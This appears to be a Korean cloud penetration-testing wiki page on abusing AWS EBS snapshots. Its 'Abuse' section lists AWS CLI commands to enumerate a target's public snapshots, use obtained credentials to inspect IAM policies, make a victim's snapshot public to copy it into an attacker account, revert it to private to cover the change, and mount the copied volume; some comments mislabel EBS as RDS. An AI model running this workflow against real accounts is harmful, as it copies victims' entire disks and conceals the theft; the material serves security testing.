EBS Snapshot

EBS(Elastic Block Store)는 EC2 인스턴스에 연결해 사용하는 블록 스토리지 서비스입니다. 하드디스크에 저장된 데이터를 탈부착하여 다른 데스크탑과 연결해 사용할 수 있는 것처럼 다른 인스턴스와 연결하여 사용할 수 있습니다.

스냅샷은 인스턴스를 저장하고자 하는 시점(특히 초기화 직후)에서 생성하면 언제든 해당 시점과 동일하게 복원할 수 있는 기능으로, 스냅샷을 통해 볼륨을 생성하는 것이 가능합니다.

따라서 스냅샷에 대해 접근 권한이 있는 자격증명을 획득하거나, 퍼블릭 스냅샷을 자신의 인스턴스에 복제하기 위해 해당 스냅샷으로부터 자신의 AWS 볼륨을 생성하고 해당 볼륨을 인스턴스에 연결함에 따라 대상 시스템을 그대로 복사할 수 있습니다.

Abuse

# Account ID를 기반으로 퍼블릭 RDS 목록 열거
aws ec2 describe-snapshots --owner-ids <target-account-id> --region ap-northeast-2 --query "Snapshots[*].[SnapshotId,VolumeSize,Description]" --output table

# 공격자 계정으로 스냅샷 복사
aws ec2 create-volume --availability-zone ap-northeast-2 --snapshot-id <snap-id>

# 획득한 크리덴셜을 이용하여 관리형 정책 확인
aws iam list-attached-user-policies --user-name <user-id> --query "AttachedPolicies[*].PolicyName" --output table

# 인라인 정책 확인
aws iam list-user-policies --user-name <user-id>
aws iam get-user-policy --user-name <user-id> --policy-name <policy-name>

# Private RDS의 스냅샷 생성
aws ec2 create-snapshot --volume-id <volume-id> --description "pentest"

# 생성한 RDS 스냅샷을 퍼블릭으로 전환
aws ec2 modify-snapshot-attribute --snapshot-id <snap-id> --attribute createVolumePermission --operation-type add --group-names all

# 공격자 계정으로 스냅샷 복사
aws ec2 create-volume --availability-zone ap-northeast-2 --snapshot-id <snap-id>

# 스냅샷을 다시 프라이빗으로 전환
aws ec2 modify-snapshot-attribute --snapshot-id <snap-id> --attribute createVolumePermission --operation-type remove --group-names all

공개 스냅샷을 검색하기 위해 AWS > EC2 > 스냅샷 > 퍼블릭 스냅샷 에서 스냅샷 아이디를 검색합니다.

검색 이후 식별된 스냅샷을 우클릭하여 스냅샷에서 볼륨 생성 후 볼륨 목록에서 생성된 볼륨을 확인합니다.

볼륨 연결을 위한 인스턴스 생성 이후 볼륨 우클릭에서 인스턴스 연결을 클릭한 뒤 생성한 인스턴스 아이디를 입력하여 연결합니다.

이후 인스턴스 시스템에 연결하여 로컬 디스크와 볼륨 정보를 확인하기 위해 lsblk 명령 사용 이후 연결된 볼륨의 경로를 마운트하여 스냅샷과 연결합니다.

# 로컬 디스크 확인
lsblk

# 디렉토리 생성 및 마운트
sudo mount /dev/xvdf1 temp

PreviousRDS Snapshot NextAccount ID Enumeration

Last updated 10 hours ago

Was this helpful?